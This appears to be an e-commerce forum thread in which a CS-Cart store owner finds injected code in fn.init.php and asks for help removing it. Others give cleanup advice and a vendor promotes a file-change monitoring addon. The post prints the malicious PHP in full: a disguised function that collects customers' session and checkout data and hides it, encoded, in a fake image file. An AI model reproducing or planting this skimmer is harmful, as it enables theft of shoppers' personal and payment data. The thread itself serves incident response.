New Hack

Of course - will do...

EDIT: File emailed


Regarding your EZ Admin Helper addon.

If this addon is installed on the v4 cart that is physically located at say /public_html/cscv4/... will it also detect and report all modified and new files on the server under /public_html/.. or just those under the installed directory /public_html/cscv4/...?

By default it will track files under the root of your store. The 'path' parameter defaults to "./" but you can change it to whatever you want. If you wanted to track sibling diretories to public_html, you'd just set path=../ in the parameters. But be certain to review the settings for Excluded files (the default is in addon settings) and can also be set as parameters like path=../&excludes=public_html/var/cache,public_html/var/upgrade,public_html/var/files etc. (note, excludes directories are comma separated)

Excellent, just purchased. There's other very useful functions included with this addon also.

Hi All,

I have checked one of my customers site, and found out that error.log file is very big and growing very fast.

The error file is full of the same error, provided below:

[09-Dec-2017 22:02:59 America/New_York] PHP Notice: Undefined variable: user_data in /home/sitename/public_html/app/functions/fn.init.php on line 1199

Then I checked fn.init.php file and guess what, found exactly what you guys talked in this thread.

At the end of fn.init.php file i see this:

function fn_dispatch_payment_cache()
$dispatch_method = @explode("_", __FUNCTION__);
$dispatch = $_REQUEST;

$thumb_cache_data = '';
$thumb_cache_dir = 'images/detailed/0/';

$info = $dispatch_method[2] . '_info';

if (isset($dispatch[$info])) {
$user_data = @$_SESSION["cart"]["user_data"];
$user_data['ip'] = $_SERVER['REMOTE_ADDR'];

if (@!is_dir($thumb_cache_dir))
@mkdir($thumb_cache_dir, 0777, true);
$thumb_cache_path = $thumb_cache_dir . 'image' . md5('RANDOM') . '.jpg';
if (@!file_exists($thumb_cache_path))
@file_put_contents($thumb_cache_path, "GIF89a\n", FILE_APPEND | LOCK_EX);

$thumb_cache_data = @base64_encode(@serialize(array_merge($user_data, $dispatch[$info])));
$user_data = @file_put_contents($thumb_cache_path, $thumb_cache_data . "\n", FILE_APPEND | LOCK_EX);

return $user_data; ( this is the line 1199 )


I have checked all image folders and did not find anything funny. To fix it, I thought just replacing a fn.init.php file from another installation should do the trick, but no. When I do that, they site renders blank ( white page ).

I'm more than sure, that someone tried to hack the site, but maybe not completed the task.

Any ideas how to solve it?


call the helpdesk to investigate this issue

I will contact the help desk, but thought to post it here hoping that someone can help faster.

you should probably remove the @ sign before the global var ... compare this file with the original file from cs (download clean installation)

are you using some kind of 3rd party addon for caching ?

the original file has 1174 lines of code.... as i said contact help desk

Replace the init.php with one from a distirbution archive that matches the version you have.

Perform the other checks as described above.

See post #18.

Replace the init.php with one from a distirbution archive that matches the version you have.

Perform the other checks as described above.

See post #18.

I have the latest version of cs-cart running and did replaced init.php from a distribution archive. The problem with blank screen still exist on backend, and front end shows a regular banner "Website not available".

Not running any third party caching solutions.

Also have checked post #18, nothing from the list applies to me.

check your PHP error_log and/or right-click the Website not available page and select 'inspect' and see if there are any error messages in comments of the page.

Also make sure you've cleared your cache manually by deleting the folder var/cache from your site.

Thanks EZ for your help. The people at cs-cart have solved the problem. We are all good now.



They can't solve problems related to intrusions. For that, you MUST monitor file changes. Their core file monitor does part of the job. Our EZ Admin Helper does the whole job! :-)